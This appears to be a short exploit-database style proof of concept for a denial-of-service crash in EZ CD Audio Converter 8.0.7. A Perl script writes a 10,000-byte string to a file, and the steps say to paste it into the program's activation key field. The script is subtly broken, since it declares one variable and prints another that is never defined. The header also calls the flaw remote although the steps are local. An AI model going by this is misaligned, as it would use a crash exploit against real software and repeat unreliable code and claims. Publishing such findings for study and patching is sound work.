# Exploit Title: EZ CD Audio Converter 8.0.7 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 22 january 2024
# Vulnerable Software: EZ CD Audio Converter 8.0.7
# Vendor Homepage: https://www.poikosoft.com/
# Software Link : https://download.poikosoft.com/ez_cd_audio_converter_setup_x64.exe
# Notification vendor: No reported
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Remote - Denial of Service (DoS)

# Steps to Produce the Crash
# 1.- Run the scripte : exploit.pl
# 2.- Open exploit.txt and copy content to clipboard
# 3.- Open EZ_CD_Audio_Converter 'Press Activate'
# 4.- Paste the content of exploit.txt into the field: 'Key'
# 5.- DoS.


#2. Proof of Concept - PoC

use strict;
use warnings;

my $exploit = "\x42" x 10000;

eval {
    open my $fh, '>', 'exploit.txt' or die "Cannot create exploit file: $!";
    print "[+] Creating... " . length($buffer) . " bytes\n";
    print $fh $buffer;
    close $fh;
    print "[+] File created!\n";
};

if ($@) {
    print "File cannot be created: $@\n";
}